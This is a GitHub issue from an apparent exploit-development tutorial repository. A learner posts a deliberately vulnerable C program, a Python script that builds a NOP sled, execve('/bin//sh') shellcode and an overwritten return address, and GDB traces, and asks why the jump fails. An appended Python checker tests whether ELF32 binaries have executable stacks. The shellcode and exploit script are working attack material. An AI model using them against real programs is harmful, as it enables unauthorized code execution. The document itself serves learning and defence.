pentest-with-shellcode's Issues

Unable to jump shellcode

Hi @Hamza-Megahed,

I was unable to reproduce https://github.com/Hamza-Megahed/pentest-with-shellcode/tree/master/7-exploit-development-part1:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int copy_to_buffer(char* input)
{
    char buffer[50];
    strcpy (buffer,input);
    return 0;
}

void main (int argc, char *argv[])
{
   int local_variable = 1;
   copy_to_buffer(argv[1]);
   exit(0);
}

gcc -m32 -fno-stack-protector -z execstack buffer.c -o buffer

#!/usr/bin/python

import struct


jump_shellcode = struct.pack("<I", 0xffffd0fc)

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
buffer = "\x90" * 39
buffer += shellcode
buffer += jump_shellcode

fp = open("3.txt", "w")
fp.write(buffer)
fp.close()
print "Done!"

GDB

(gdb) 
(gdb) 
(gdb) break main
Breakpoint 1 at 0x58b
(gdb) run $(cat 3.txt)
Starting program: /home/shellcodes/exploit_shellcode/buff $(cat 3.txt)

Breakpoint 1, 0x5655558b in main ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/100x $esp - 100
0xffffd0cc:	0x5655556f	0xffffd0ee	0xffffd3e1	0xffffd0fb
0xffffd0dc:	0x56555559	0x000000c2	0x00000000	0x00c30000
0xffffd0ec:	0x90900001	0x90909090	0x90909090	0x90909090
0xffffd0fc:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd10c:	0x90909090	0x90909090	0x90909090	0x50c03190
0xffffd11c:	0x732f2f68	0x622f6868	0xe3876e69	0x80cd0bb0
0xffffd12c:	0x42424242

You can see EIP is overwritten, but when I set an address (0xffffd0fc), I always get a Segmentation fault error and /bin/sh does not work.

After setting EIP

GDB

(gdb) run $(cat 3.txt)
Starting program: /home/shellcodes/exploit_shellcode/buff $(cat 3.txt)

Program received signal SIGSEGV, Segmentation fault.
0xffffd126 in ?? ()
(gdb) x/100x $esp - 100
0xffffd0c0:	0xffffd0fa	0x56556fd4	0xf7f9d000	0x5655556f
0xffffd0d0:	0xffffd0ee	0xffffd3e1	0xffffd0fb	0x56555559
0xffffd0e0:	0x000000c2	0x00000000	0x00c30000	0x90900001
0xffffd0f0:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd100:	0x90909090	0x90909090	0x90909090	0x90909090
0xffffd110:	0x90909090	0x90909090	0x50c03190	0x732f2f68
0xffffd120:	0x622f6868	0x6e69622f	0x68732f2f	0x00000000
0xffffd130:	0xffffd300	0x56556fd4	0x00000002	0x56555593
0xffffd140:	0x00000002	0xffffd204	0xffffd210	0x00000001
EAX: 0x0 
EBX: 0xe3876e69 
ECX: 0xffffd420 --> 0xffffd0 
EDX: 0xffffd12d --> 0x0 
ESI: 0x2 
EDI: 0xf7f9d000 --> 0x1d1d70 
EBP: 0x80cd0bb0 
ESP: 0xffffd124 ("/bin//sh")
EIP: 0xffffd126 ("in//sh")

My EIP is 0xffffd126 ("in//sh"); 2 bytes are missing here. Why?

Thanks,
Ahmed
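
The test binary in this issue is built with `-z execstack`, which is what allows code placed on the stack to run at all. As an added example (not code from the issue or from the repository), the following Python 3 check reads the `PT_GNU_STACK` program header of a little-endian ELF32 image and reports whether the stack is marked executable; the function names and the sample images are constructed for this example.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that carries the stack permissions
PF_X = 0x1                 # "executable" bit in p_flags

def stack_is_executable(elf: bytes):
    """Return True/False from PT_GNU_STACK of an ELF32 image, None if it is absent."""
    if len(elf) < 52 or elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if elf[4] != 1 or elf[5] != 1:  # EI_CLASS=ELFCLASS32, EI_DATA=ELFDATA2LSB
        raise ValueError("only little-endian ELF32 (gcc -m32 on x86) is handled")
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    if e_phnum and e_phentsize < 32:
        raise ValueError("program header entries are too small")
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + 32 > len(elf):
            raise ValueError("truncated program header table")
        # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
        p_type, _, _, _, _, _, p_flags, _ = struct.unpack_from("<8I", elf, off)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None  # no marking: the loader falls back to the architecture default

def sample_elf32(stack_flags):
    """Constructed sample: ELF32 header, one PT_LOAD, optionally one PT_GNU_STACK."""
    phdrs = [struct.pack("<8I", 1, 0, 0x08048000, 0x08048000, 0x100, 0x100, 5, 0x1000)]
    if stack_flags is not None:
        phdrs.append(struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 0x10))
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    header = struct.pack("<16sHHIIIIIHHHHHH", ident, 2, 3, 1, 0x08048000, 52, 0, 0,
                         52, 32, len(phdrs), 40, 0, 0)
    return header + b"".join(phdrs)

if __name__ == "__main__":
    # PF_R|PF_W|PF_X = 7 (as with -z execstack), PF_R|PF_W = 6 (non-executable stack)
    for label, flags in (("rwx stack", 7), ("rw stack", 6), ("no marking", None)):
        print(label, "->", stack_is_executable(sample_elf32(flags)))
```

To audit a real build, pass the file contents, for example `stack_is_executable(open("buffer", "rb").read())`; a result of `True` or `None` means the binary should be rebuilt without `-z execstack`.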
